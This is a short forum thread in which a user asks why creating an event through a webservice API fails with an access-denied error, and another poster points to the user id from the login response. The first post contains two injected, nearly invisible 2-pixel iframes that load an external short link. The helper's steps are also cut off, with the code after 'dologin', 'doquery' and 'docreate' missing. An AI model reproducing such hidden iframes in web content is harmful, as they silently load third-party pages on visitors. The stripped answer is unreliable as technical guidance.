hi all,
i am tring to create event by calling webservice! it shows me error
"ACCESS_DENIED:Cannot assign record to the given user" my var value is
$assigned_user_id = 'admin'; any idea??? <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
like in the other place please use the userid from the login response.
can you please tell me how do i get userid from the login response!
my code for login is
$login = $client->dologin($userid, $key);
if(!$login) echo 'login failed'; <!-- s:?: --><img src="{smilies_path}/icon_question.gif" alt=":?:" title="question" /><!-- s:?: -->
to get this special id do the folowing :
after dologin :
after a doquery :
after a docreate :
please come back to say if it worked for you.
david v.
thanks mr.david ! i really appreciate your help!
though i fully understand its the release 1 and soon we'll have better version <!-- s:) --><img src="{smilies_path}/icon_smile.gif" alt=":)" title="smile" /><!-- s:) -->